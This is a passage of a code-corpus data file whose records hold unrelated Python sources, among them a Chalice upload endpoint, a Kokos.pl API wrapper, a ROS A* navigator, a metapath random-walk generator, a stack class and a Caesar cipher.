each student.\t\n\"\"\"\n\n@app.route('/', methods=['POST'], content_types=['multipart/form-data'], cors=True)\ndef handle_data():\n\n\t\"\"\"Function, which implements parsing a multipart/form-data request type.\n\t Reference: \n\t https://github.com/aws/chalice/issues/796\n\n\t This has to be implemented since Chalice microservice itself cannot \n\t parse this type of request. \n\n\t Returns:\n\t a dictionary of all of the fields in the multipart/form-data request. \t \n\t\"\"\"\n\t\n\tdef _get_parts():\n\n\t rfile = BytesIO(app.current_request.raw_body)\n\t content_type = app.current_request.headers['content-type']\n\t _, parameters = cgi.parse_header(content_type)\n\t parameters['boundary'] = parameters['boundary'].encode('utf-8')\n\t parsed = cgi.parse_multipart(rfile, parameters)\n\t return parsed\n\n\t# Retrieve all parts of the request\n\tfiles = _get_parts()\n\tdictionary = {k: v[0].decode('utf-8') for (k, v) in files.items()} \n\timage = dictionary['image']\n\tdata = {\n\n\t\t \"school_name\": dictionary['school_name'],\n\t \"students_list\": json.dumps(dictionary['students_list'])\n\t}\n\n\tendpoint = dictionary['endpoint']\n\n\t# Send a request to the proper endpoint, which is hidden in AWS structures by default.\n\t\n\tresponse = client.invoke_endpoint(EndpointName = endpoint, \n\t\t\t\t\t\t\t\t\t ContentType = 'application/x-image',\n Body = image,\n Accept = str(data) # This should be CustomAttributes, however:\n )\t # - this header can be used only in python 3.7\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # - unfortunately, in python 3.7 we are not able to parse \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # multipart/form-data request type, see for reference:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # https://github.com/python/cpython/pull/8530\n\tresponse_body = response['Body']\n\treturn response_body.read()\n\t\n\n\n","sub_path":"opt/program/face-recognition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"563807490","text":"from grand.datasets import load_vehicles, load_artificial_toy\nfrom grand import IndividualAnomalyInductive\n\nif __name__ == '__main__':\n \n # Get data from one unit (vehicle)\n dataset = load_artificial_toy(0) #load_vehicles()\n unit1_train = [ x for dt, x in dataset.stream_unit(1) ] # we use unit number 1 for training\n\n # Create an instance of IndividualAnomalyInductive\n indev = IndividualAnomalyInductive( w_martingale=15, # Window size for computing the deviation level\n non_conformity=\"median\", # Strangeness measure: \"median\" or \"knn\" or \"lof\"\n k=50, # Used if non_conformity is \"knn\"\n dev_threshold=.6) # Threshold on the deviation level\n\n # Fit the IndividualAnomalyInductive detector to unit1_train\n indev.fit(unit1_train)\n\n # At each time step dt, a data-point x comes from the stream of unit number 0\n for dt, x in dataset.stream_unit(0):\n devContext = indev.predict(dt, x)\n \n st, pv, dev, isdev = devContext.strangeness, devContext.pvalue, devContext.deviation, devContext.is_deviating\n print(\"Time: {} ==> strangeness: {}, p-value: {}, deviation: {} ({})\".format(dt, st, pv, dev, \"high\" if isdev else \"low\"))\n\n # Plot p-values and deviation level over time\n indev.plot_deviations()\n","sub_path":"examples/individual_deviation_inductive_example.py","file_name":"individual_deviation_inductive_example.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606325906","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nKokos\n~~~~~\nProsty wrapper na api Kokos.pl\n\nauthor: Satanowski \n\"\"\"\n\nfrom datetime import datetime\nfrom time import sleep\nimport requests, zlib\n\nextd_dict = lambda x, y: dict(list(x.items()) + list(y.items()))\n\nclass Kokos(object):\n \"Kokos WebAPI wrapper\"\n\n API_URL = \"https://kokos.pl/webapi/\"\n\n PARAMETERS = [\"user_id\", \"user\", \"title\", \"status\", \"valueFrom\", \"valueTo\",\\\n \"periodFrom\", \"periodTo\", \"percentFrom\", \"percentTo\", \"completedFrom\",\\\n \"completedTo\", \"investorsFrom\", \"investorsTo\", \"rating\", \"province\", \\\n \"insuranceNumber\", \"insuranceFirm\", \"isAllegroVerified\", \"intent\",\\\n \"page\"]\n\n AUCTION_STATUS = [100, 110, 500, 1100, 1200, 1300, 1400, 1500]\n\n\n def __init__(self, api_key=\"\"):\n self.api_key = api_key\n self.last_request = datetime.now()\n\n\n def _query(self, method, parameters, **kwargs):\n \"Make HTTP request to Kokos.pl WebAPI\"\n\n payload = {\n \"type\":\"json\",\n \"key\":self.api_key\n }\n\n if parameters:\n payload = extd_dict(payload, parameters)\n payload = extd_dict(payload, kwargs)\n\n while (datetime.now() - self.last_request).seconds < 1:\n #do not exceed API limit of req/second\n sleep(0.25)\n\n r = requests.get(Kokos.API_URL+method, params=payload)\n self.last_request = datetime.now()\n\n head = r.headers.get('content-type')\n if r.status_code == 200:\n if \"application/json\" in head:\n return r.json()\n elif \"text/html\" in head and method == \"get-auctions-by-status\":\n try:\n raw = zlib.decompress(r.content, 16+zlib.MAX_WBITS)\n except:\n raw = None\n if not raw:\n return None\n now = datetime.now()\n fname = \"auctions_by_status-%d_%d_%d.json\" % \\\n (now.year, now.month, now.day)\n try:\n with open(fname, \"wb\") as f:\n f.write(raw)\n except IOError:\n print(\"Nie można zapisać pliku: \" + fname)\n\n return fname\n return None\n\n\n\n def get_auction_data(self, auction_id, comments=False):\n \"Pobranie szczegółowych danych jednej wybranej aukcji.\"\n\n resp = self._query(\"get-auction-data\", None, id=auction_id, \\\n comments=comments and \"1\" or \"0\")\n if resp:\n return resp.get(\"response\").get(\"auction\")\n\n return None\n\n\n def get_auctions_by_status(self, status):\n \"Pobranie listy pożyczek według statusu.\"\n\n if not status in Kokos.AUCTION_STATUS:\n return None\n\n resp = self._query(\"get-auctions-by-status\", None, status=status)\n\n if resp:\n print(\"Pobrane dane zapisano do pliku: \" + resp)\n return True\n\n return None\n\n\n def search(self, params=None):\n \"Wyszukiwanie aukcji według podanych parametrów.\"\n\n par = params or {}\n [par.pop(k) for k in par.keys() if not k in Kokos.PARAMETERS]\n\n resp = self._query(\"search\", par)\n if resp:\n return resp.get(\"response\")\n return None\n\n\n def get_most_popular_auctions(self, records=10):\n \"Pobranie najbardziej popularnych aukcji.\"\n resp = self._query(\"get-most-popular-auctions\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"auctions\")\n return None\n\n\n def get_recent_auctions(self, records=10, page=1):\n \"Pobranie ostatnio założonych aukcji.\"\n\n resp = self._query(\"get-recent-auctions\", None, records=records, page=page)\n if resp:\n return resp.get(\"response\").get(\"auctions\")\n return None\n\n\n def get_recent_payments(self, records=10):\n \"Pobranie ostatnich wpłat za raty.\"\n\n resp = self._query(\"get-recent-payments\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"payments\")\n return None\n\n\n def get_recent_investments(self, records=10):\n \"Pobranie najnowszych inwestycji.\"\n\n resp = self._query(\"get-recent-investments\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"investments\")\n return None\n\n\n def get_ended_auctions_amount(self, records=10, page=1):\n \"Pobranie sumy wartości aukcji zakończonych sukcesem.\"\n resp = self._query(\"get-ended-auctions-amount\", None, records=records, \\\n page=page)\n\n if resp:\n return resp.get(\"response\")\n return None\n\n\n def get_service_stats(self):\n \"Pobranie statystyk serwisu.\"\n resp = self._query(\"get-service-stats\", None)\n\n if resp:\n return resp.get(\"response\").get(\"serviceStats\")\n\n return None\n\n\n def get_user_id_by_nick(self, nick):\n \"Pobranie ID użytkownika na podstawie jego nick-u.\"\n\n resp = self._query(\"get-user-id-by-nick\", None, \\\n nick=nick)\n if resp:\n return resp.get(\"response\").get(\"user\")\n\n return None\n\n\n def get_payment_stats(self, year_month):\n \"Pobranie statystyk spłacalności dla całego serwisu.\"\n\n resp = self._query(\"get-payment-stats\", None, \\\n yearMonth=year_month)\n\n return resp.get(\"response\") or None\n\n\n def get_vindication_stats(self):\n \"Pobranie statystyk spłacalności.\"\n\n resp = self._query(\"get-vindication-stats\", None)\n if resp:\n return resp.get(\"response\")\n return None\n\n\n\n\n\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestSuite(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.apikey = \"\"\n while not cls.apikey:\n cls.apikey = input('Enter your API key:')\n\n cls.kokos = Kokos(cls.apikey)\n\n def test_get_payment_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_payment_stats(\"201212\"))\n\n def test_get_user_id_by_nick(self):\n self.assertIsNotNone(TestSuite.kokos.get_user_id_by_nick(\"Interstellar\"))\n\n def test_get_service_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_ended_auctions_amount())\n\n def test_get_recent_investments(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_investments())\n\n def test_get_recent_payments(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_payments())\n\n def test_get_recent_auctions(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_auctions())\n\n def test_get_most_popular_auctions(self):\n self.assertIsNotNone(TestSuite.kokos.get_most_popular_auctions())\n\n def test_get_auctions_by_status(self):\n self.assertIsNotNone(TestSuite.kokos.get_auctions_by_status(100))\n\n def test_get_auction_data(self):\n self.assertIsNotNone(TestSuite.kokos.get_auction_data(145838))\n\n def test_search(self):\n self.assertIsNotNone(TestSuite.kokos.search({\"user\":\"Interstellar\"}))\n\n def test_get_vindication_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_vindication_stats())\n\n unittest.main()\n","sub_path":"src/kokos.py","file_name":"kokos.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"240319524","text":"import os, glob, shutil\n\n\n\n# This script renames the individual files in a folder by concatenate\n# the folder name and file name (usually just numbers)\n\ninputFolder = '/Volumes/ShaoheGtech/2019-1-Shaohe/190130-spheroids-by-Kaz/MDCKII-SIMS/'\n\nfolderList = glob.glob(inputFolder + \"*/\")\n\nfor folder in folderList:\n\tprint(folder)\n\tfolderName = folder.split(\"/\")[-2]\n\tprint(folderName)\n\tfileList = glob.glob(folder + \"*\")\n\tfor f in fileList:\n\t\tnewFileName = inputFolder + folderName + \"-\" + f.split(\"/\")[-1]\n\t\tprint(newFileName)\n\t\tos.rename(f, newFileName)\n\nfor folder in folderList:\n\tshutil.rmtree(folder)\n","sub_path":"renameFilesByPrefixingFolderName.py","file_name":"renameFilesByPrefixingFolderName.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212748403","text":"#!/usr/bin/env python\n\nimport rospy\nfrom nav_msgs.msg import MapMetaData, OccupancyGrid\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tf\nfrom std_msgs.msg import Float32MultiArray, Bool\nfrom astar import AStar, DetOccupancyGrid2D, StochOccupancyGrid2D\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseStamped\nimport pdb\n\nclass Navigator:\n\n def __init__(self):\n rospy.init_node('navigator', anonymous=True)\n\n self.plan_resolution = .15\n self.plan_horizon = 15\n self.replan_threshold = self.plan_resolution*0.3\n\n self.map_width = 0\n self.map_height = 0\n self.map_resolution = 0\n self.map_origin = [0,0]\n self.map_probs = []\n self.occupancy = None\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.last_path = None\n self.has_robot_location = False\n self.tries = 0\n\n self.nav_sp = None\n self.pose_sp = (0.0,0.0,0.0)\n\n self.trans_listener = tf.TransformListener()\n\n rospy.Subscriber(\"map\", OccupancyGrid, self.map_callback)\n rospy.Subscriber(\"map_metadata\", MapMetaData, self.map_md_callback)\n rospy.Subscriber(\"/turtlebot_controller/nav_goal\", Float32MultiArray, self.nav_sp_callback)\n\n self.pose_sp_pub = rospy.Publisher('/turtlebot_controller/position_goal', Float32MultiArray, queue_size=10)\n self.nav_path_pub = rospy.Publisher('/turtlebot_controller/path_goal', Path, queue_size=10)\n # publish status of astar\n self.astar_status = rospy.Publisher('/turtlebot_controller/astar_status', Bool, queue_size=10)\n # waypoint done\n self.waypoint_done = rospy.Publisher('/turtlebot_control/waypoint_done', Bool, queue_size=10)\n\n def map_md_callback(self,msg):\n self.map_width = msg.width\n self.map_height = msg.height\n self.map_resolution = msg.resolution\n self.map_origin = (msg.origin.position.x,msg.origin.position.y)\n\n def map_callback(self,msg):\n self.map_probs = msg.data\n if self.map_width>0 and self.map_height>0 and len(self.map_probs)>0:\n self.occupancy = StochOccupancyGrid2D(self.map_resolution,\n self.map_width,\n self.map_height,\n self.map_origin[0],\n self.map_origin[1],\n int(self.plan_resolution / self.map_resolution*2.3),\n self.map_probs)\n if self.has_robot_location and self.nav_sp:\n state_min = (-int(round(self.plan_horizon)), -int(round(self.plan_horizon)))\n state_max = (int(round(self.plan_horizon)), int(round(self.plan_horizon)))\n x_init = (round(self.x/self.plan_resolution)*self.plan_resolution, round(self.y/self.plan_resolution)*self.plan_resolution)\n x_goal = (round(self.nav_sp[0]/self.plan_resolution)*self.plan_resolution, round(self.nav_sp[1]/self.plan_resolution)*self.plan_resolution)\n astar = AStar(state_min,state_max,x_init,x_goal,self.occupancy,self.plan_resolution)\n\n if self.last_path and astar.check_path(self.last_path):\n rospy.logwarn(\"Last computed path is still valid\")\n self.send_controller_goal()\n else:\n self.send_pose_sp() # every time the map changes, we need to update our astar path. (also updates the position goal)\n\n def nav_sp_callback(self,msg):\n new_nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n if not self.nav_sp:\n self.nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n self.send_pose_sp()\n rospy.logwarn('Initializing target (should only happen at bootup)')\n elif ((new_nav_sp[2]-self.nav_sp[2])**2 + (new_nav_sp[1]-self.nav_sp[1])**2 + (new_nav_sp[0]-self.nav_sp[0])**2)>self.replan_threshold**2:\n self.nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n rospy.logwarn('New target received, replanning')\n self.send_pose_sp()\n else:\n rospy.logwarn('Old target is close enough, will not replan')\n\n def send_controller_goal(self):\n path_to_robot_dist = np.array(map(lambda x: (x[1]-self.y)**2 + (x[0]-self.x)**2, self.last_path))\n track_lookahead = 4\n closest_pt = np.argmin(path_to_robot_dist)\n track_astar_step_no = min(closest_pt + track_lookahead, len(self.last_path) - 1) # we tell the controller to track the track_astar_step_no-th point in the A* path\n\n if len(self.last_path) > track_astar_step_no:\n # a naive path follower we could use\n # final_orientation_ctrl=np.arctan2(astar.path[track_astar_step_no][1]-astar.path[track_astar_step_no-1][1],astar.path[track_astar_step_no][1]-astar.path[track_astar_step_no-1][1])\n final_orientation_ctrl = np.arctan2(self.last_path[track_astar_step_no][1] - self.last_path[closest_pt][1],self.last_path[track_astar_step_no][1] - self.last_path[closest_pt][1])\n self.pose_sp = (self.last_path[track_astar_step_no][0], self.last_path[track_astar_step_no][1], final_orientation_ctrl)\n msg = Float32MultiArray()\n msg.data = self.pose_sp\n self.pose_sp_pub.publish(msg)\n # astar.plot_path()\n else:\n # when astar gives a single point, position goal is tag position\n msg = Float32MultiArray()\n msg.data = self.nav_sp\n self.pose_sp_pub.publish(msg)\n\n # needed for rviz\n path_msg = Path() # path message for rviz\n path_msg.header.frame_id = 'map' # path message for rviz\n for state in self.last_path: # for the astar solution found\n pose_st = PoseStamped() # path message for rviz\n pose_st.pose.position.x = state[0]\n pose_st.pose.position.y = state[1]\n pose_st.header.frame_id = 'map'\n path_msg.poses.append(pose_st)\n self.nav_path_pub.publish(path_msg)\n\n def update_location(self):\n try:\n (robot_translation,robot_rotation) = self.trans_listener.lookupTransform(\"/map\", \"/base_footprint\", rospy.Time(0))\n self.has_robot_location = True\n self.x = robot_translation[0]\n self.y = robot_translation[1]\n self.theta = tf.transformations.euler_from_quaternion(robot_rotation)[2]\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n robot_translation = (0,0,0)\n robot_rotation = (0,0,0,1)\n self.has_robot_location = False\n def send_pose_sp(self):\n\n\n if self.occupancy and self.has_robot_location and self.nav_sp:\n state_min = (-int(round(self.plan_horizon)), -int(round(self.plan_horizon)))\n state_max = (int(round(self.plan_horizon)), int(round(self.plan_horizon)))\n x_init = (round(self.x/self.plan_resolution)*self.plan_resolution, round(self.y/self.plan_resolution)*self.plan_resolution)\n x_goal = (round(self.nav_sp[0]/self.plan_resolution)*self.plan_resolution, round(self.nav_sp[1]/self.plan_resolution)*self.plan_resolution)\n astar = AStar(state_min,state_max,x_init,x_goal,self.occupancy,self.plan_resolution)\n\n rospy.logwarn(\"Computing navigation plan\")\n if astar.solve():\n self.tries = 0\n self.astar_status.publish(True)\n rospy.logwarn(\"A* solved\")\n self.last_path = astar.path\n self.send_controller_goal()\n\n else:\n rospy.logwarn(\"Could not find path\")\n\n\n\n\n self.tries += 1\n msg = Float32MultiArray()\n if self.tries % 2 == 1:\n rospy.logwarn(\"Could not find path: spin a bit to try free itself\")\n msg.data = (self.x, self.y, self.theta + np.pi/2)\n self.pose_sp_pub.publish(msg)\n elif astar.is_free((self.x + self.plan_resolution*np.cos(self.theta), self.y + self.plan_resolution*np.sin(self.theta))):\n rospy.logwarn(\"Could not find path: after spinning a bit, move forward\")\n msg.data = (self.x + self.plan_resolution*np.cos(self.theta), self.y + self.plan_resolution*np.sin(self.theta), self.theta)\n self.pose_sp_pub.publish(msg)\n\n self.astar_status.publish(False)\n \n self.last_path = None\n\n def run(self):\n rate = rospy.Rate(10) # 10 Hz\n while not rospy.is_shutdown():\n self.update_location()\n #if (np.linalg.norm(np.array([self.x, self.y]) - np.array([self.pose_sp[0], self.pose_sp[1]])) < self.plan_resolution*0.7) :\n \t#\t self.send_pose_sp()\n #rospy.logwarn(\"Arrived at pose_sp recomputing path\")\n rate.sleep()\n\n\n\n# to do: publish waypoint_done\n\nif __name__ == '__main__':\n nav = Navigator()\n nav.run()\n\npass\n\n","sub_path":"scripts/navigator.py","file_name":"navigator.py","file_ext":"py","file_size_in_byte":9122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35824802","text":"import numpy as np\nimport random\nclass MetaPathGenerator(object):\n def __init__(self):\n self.paper_author = dict ()\n self.author_paper = dict ()\n self.paper_org = dict ()\n self.org_paper = dict ()\n self.paper_conf = dict ()\n self.conf_paper = dict ()\n\n ##########read author's feature and write the paper's relation to files#######################\n def read_data (self, dirpath):\n temp = set ()\n with open (dirpath + \"/paper_org.txt\", encoding='utf-8') as pafile:\n for line in pafile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = toks[0], toks[1]\n if p not in self.paper_org:\n self.paper_org[p] = []\n self.paper_org[p].append (a)\n if a not in self.org_paper:\n self.org_paper[a] = []\n self.org_paper[a].append (p)\n temp.clear ()\n\n with open (dirpath + \"/paper_author.txt\", encoding='utf-8') as pafile:\n for line in pafile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = toks[0], toks[1]\n if p not in self.paper_author:\n self.paper_author[p] = []\n self.paper_author[p].append (a)\n if a not in self.author_paper:\n self.author_paper[a] = []\n self.author_paper[a].append (p)\n temp.clear ()\n\n with open (dirpath + \"/paper_conf.txt\", encoding='utf-8') as pcfile:\n for line in pcfile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = toks[0], toks[1]\n if p not in self.paper_conf:\n self.paper_conf[p] = []\n self.paper_conf[p].append (a)\n if a not in self.conf_paper:\n self.conf_paper[a] = []\n self.conf_paper[a].append (p)\n temp.clear ()\n\n # print (\"#papers \", len (self.paper_conf))\n # print (\"#authors\", len (self.author_paper))\n # print (\"#org_words\", len (self.org_paper))\n # print (\"#confs \", len (self.conf_paper))\n\n ######generate the random walk's meta path##############\n def generate_WMRW (self, outfilename, numwalks, walklength):\n outfile = open (outfilename, 'w')\n for paper0 in self.paper_conf:\n for j in range (0, numwalks): # wnum walks\n paper = paper0\n outline = \"\"\n i = 0\n while (i < walklength):\n i = i + 1\n if paper in self.paper_author:\n authors = self.paper_author[paper]\n numa = len (authors)\n authorid = random.randrange (numa)\n author = authors[authorid]\n\n papers = self.author_paper[author]\n nump = len (papers)\n if nump > 1:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n while paper1 == paper:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n paper = paper1\n outline += \" \" + paper\n\n if paper in self.paper_org:\n words = self.paper_org[paper]\n numw = len (words)\n wordid = random.randrange (numw)\n word = words[wordid]\n\n papers = self.org_paper[word]\n nump = len (papers)\n if nump > 1:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n while paper1 == paper:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n paper = paper1\n outline += \" \" + paper\n\n outfile.write (outline + \"\\n\")\n outfile.close ()","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"463006020","text":"# Team 54\r\n# 1. Jian Lu 753184\r\n# 2.Pavel Tolmachev 848766\r\n# 3. Xiaoyang Wu 929595\r\n# 4. Da born 871643\r\n\r\npath= \"C:\\\\Users\\\\ptolmachev\\\\Documents\\\\0Study\\\\Cloud and cluster computing\\\\Assignment 2\\\\Boundaries_SA2\\\\SA2_2016_AUST.shp\"\r\n\r\nimport os\r\nimport shapefile\r\nimport numpy as np\r\nfrom operator import itemgetter\r\nimport pickle\r\n\r\ndef save_obj(obj, name ):\r\n with open(name + '.pkl', 'wb') as f:\r\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load_obj(name ):\r\n with open(name + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\n \r\nREGION = \"VICTORIA\"\r\n\r\nprint(\"Reading coordinates file...\")\r\nsf = shapefile.Reader(path)\r\nshapes = sf.shapes()\r\nnames = sf.records()\r\nnames = list(map(itemgetter(2), sf.records()))\r\nstate = list(map(itemgetter(10), sf.records()))\r\nprint(\"regions loaded: \", len(names))\r\n\r\nregionCode_RegionName = []\r\nregionCode_Polygons = []\r\n\r\nfor i in range(len(names)):\r\n if (len(shapes[i].points) != 0) and (state[i].upper() == \"VICTORIA\"):\r\n regionCode_RegionName.append(names[i].upper())\r\n regionCode_Polygons.append(shapes[i].points)\r\n\r\nprint(\"Coordinates reading complete.\")\r\nfor i in range(len(regionCode_RegionName)):\r\n if(len(regionCode_Polygons[i]) == 0):\r\n print(regionCode_RegionName[i],regionCode_Polygons[i])\r\n\r\n\r\nprint(\"Generating regions map...\")\r\nregionCode_Lontitude = []\r\nregionCode_Latitude = []\r\nregions = dict()\r\n\r\nfor i in range(len(regionCode_RegionName)):\r\n center = np.mean(regionCode_Polygons[i],axis = 0)\r\n regions[regionCode_RegionName[i]] = [regionCode_Polygons[i],center]\r\n # centerOfRegions[regionCode_RegionName[i]] = center\r\n# print(\"Regions map generated.\")\r\n\r\n# print(ocateRegion(lontitude,latitude,regionNumberLontitude,regionNumberLatitude))\r\n\r\nname = \"SA2_polygons_\" + REGION\r\nsave_obj(regions, name)\r\nprint(\"the resulting dictionary is saved into: \" + name+ '.pkl')","sub_path":"SA2_dictionary.py","file_name":"SA2_dictionary.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"485082968","text":"import rclpy\nfrom rclpy.node import Node\nimport serial\n\nfrom std_msgs.msg import Bool\n\n\nclass EyeNode(Node):\n def __init__(self):\n super().__init__('eye_node')\n self.get_logger().info('EyeNode started')\n self.eye_listener = self.create_subscription(Bool, 'eye_control', self.eye_callback, 10)\n self.eye_publisher = self.create_publisher(Bool, 'eye_status', 10)\n self.port = serial.Serial(\"/dev/cu.usbmodem14201\", 115200)\n self.timer = self.create_timer(0.5, self.eye_status)\n\n def eye_callback(self, msg):\n if msg.data == True:\n self.port.write(b\"o\")\n self.get_logger().info(\"Eye are opening...\")\n else:\n self.port.write(b\"c\")\n self.get_logger().info(\"Eye are closing...\")\n\n def eye_status(self):\n msg = Bool()\n self.port.write(b\"s\")\n status = self.port.readline()\n if status == b\"opened\\n\":\n msg.data = True\n self.eye_publisher.publish(msg)\n else:\n msg.data = False\n self.eye_publisher.publish(msg)\n self.get_logger().info(f\"Eyes are {status}\")\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n main_node = EyeNode()\n\n\n rclpy.spin(main_node)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n main_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pretty_woman/install/pretty_woman/lib/python3.8/site-packages/pretty_woman/eye_node.py","file_name":"eye_node.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157571680","text":"# Stack implementation using singly Linked lIst\n# create a Node class\n# Time and Space Complexity:\n\"\"\"The time Complexity for checking,\n a) isEmpty method will be O(n) due to the fact it will check throughout all elements in the Stack list\n b) Push,pop and peek methods will take O(1) time complexity as it just push to the recent spot without passing through\n the whole code.\n c) The size method will take O(n) time complexity due to the factor that it has it has to pass and check all elements\n in a stack and returns the value of total number of elements.\n\n Space Complexity:\n a) The Empty and size method will take O(1) space complexity due to the factors that they don't add anything to\n the Stack but rather checking elements\n b) The peek and pop method will take O(1) space complexity as it removes and peeks but doesn't require any addition\n of the structure of Stack\n c) The push method will take O(n) space complexity in a worst case scenario as it involves requiring an extra space\n every time adding an element to the Stack.\"\"\"\n\n\nclass Node:\n def __init__(self, Linked_List_Data):\n self.data = Linked_List_Data\n self.next = None\n self.prev = None\n\n\n# create a class Stack with Linked list Object\n\nclass Stack:\n def __init__(self, ):\n self.head = None\n\n # method to add element to the stack\n\n def push(self, data):\n if self.head is None:\n self.head = Node(data)\n else:\n new_node = Node(data)\n self.head.prev = new_node\n new_node.next = self.head\n new_node.prev = None\n self.head = new_node\n\n # method to remove an element from a stack\n def pop(self):\n if self.isEmpty():\n return None\n else:\n Node_to_Pop = self.head\n self.head = self.head.next\n Node_to_Pop.next = None\n return Node_to_Pop.data\n # if self.head is None:\n # return None\n # else:\n # temp = self.head.data\n # self.head = self.head.next\n # self.head.prev = None\n # return temp\n\n # method to return an top element of the Stack\n def peek(self):\n if self.isEmpty():\n return None\n else:\n return self.head.data\n\n def top(self):\n return self.head.data\n\n # method to return the size of the Stack\n def size(self):\n temp = self.head\n count = 0\n while temp is not None:\n count = count + 1\n temp = temp.next\n return count\n\n # method to check Stack if empty\n\n def isEmpty(self):\n if self.head is None:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n Implementation = Stack()\n Implementation.push(4)\n # print(Implementation.pop())\n # print(Implementation.peek())\n # print(Implementation.size())\n","sub_path":"Week 5/Question_3.py","file_name":"Question_3.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258828045","text":"import tensorflow as tf\r\nfrom tensorflow.keras.utils import to_categorical\r\n\r\n\r\ndef load_MNIST(one_hot_encoding=True, num_classes=10, load_validation=True, num_validation=5000):\r\n train_sample, test_sample = tf.keras.datasets.mnist.load_data()\r\n (train_x,train_y), (test_x,test_y) = train_sample, test_sample\r\n if load_validation==False:\r\n if one_hot_encoding==True:\r\n train_y = to_categorical(train_y,num_classes=num_classes)\r\n test_y = to_categorical(test_y,num_classes=num_classes)\r\n return (train_x,train_y), (test_x,test_y)\r\n else:\r\n validation_x = train_x[-num_validation:]\r\n validation_y = train_y[-num_validation:]\r\n train_x = train_x[:-num_validation]\r\n train_y = train_y[:-num_validation]\r\n if one_hot_encoding==True:\r\n train_y = to_categorical(train_y,num_classes=num_classes)\r\n test_y = to_categorical(test_y,num_classes=num_classes)\r\n validation_y = to_categorical(validation_y,num_classes=num_classes)\r\n return (train_x,train_y), (test_x,test_y), (validation_x, validation_y)","sub_path":"Vision/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611033485","text":"class Caesar:\n def __init__(self):\n self.__letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n \n def encrypt(self, texto_plano, key = 3):\n '''(Caesar, str, int) -> str\n \n Retorna o texto_plano cifrado com a cifra\n de Cesar, utlizando a chave key,\n cujo padrao e 3.\n '''\n cipher_text = ''\n texto_plano = texto_plano.upper()\n for ch in texto_plano:\n if ch in self.__letters:\n idx = self.__letters.find(ch) + key\n if idx >= 26:\n idx -= 26\n cipher_text += self.__letters[idx]\n return cipher_text\n \n def decrypt(self, texto_cifrado, key = 3):\n ''' (Caesar, str, int) -> str\n \n Retorna em texto plano o texto_cifrado decifrado\n com a cifra de Cesar, utilizando a chave key,\n cujo padrao e 3.\n '''\n plain_text = ''\n texto_cifrado = texto_cifrado.upper()\n for ch in texto_cifrado:\n if ch in self.__letters:\n idx = self.__letters.find(ch) - key\n plain_text += self.__letters[idx]\n return plain_text.lower()","sub_path":"cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424471633","text":"# -*- coding: utf-8 -*-\n\nfrom ctypes import *\nimport DataStructure\nfrom copy import deepcopy\n\n\nclass KnowledgeHolder(object):\n \"\"\"\n 共有メモリ上のAgentの知識、その中のwords,geneなど\n を探索する.\n 特定のAgentIDを検索すると各メソッドの返り値が自動的に\n 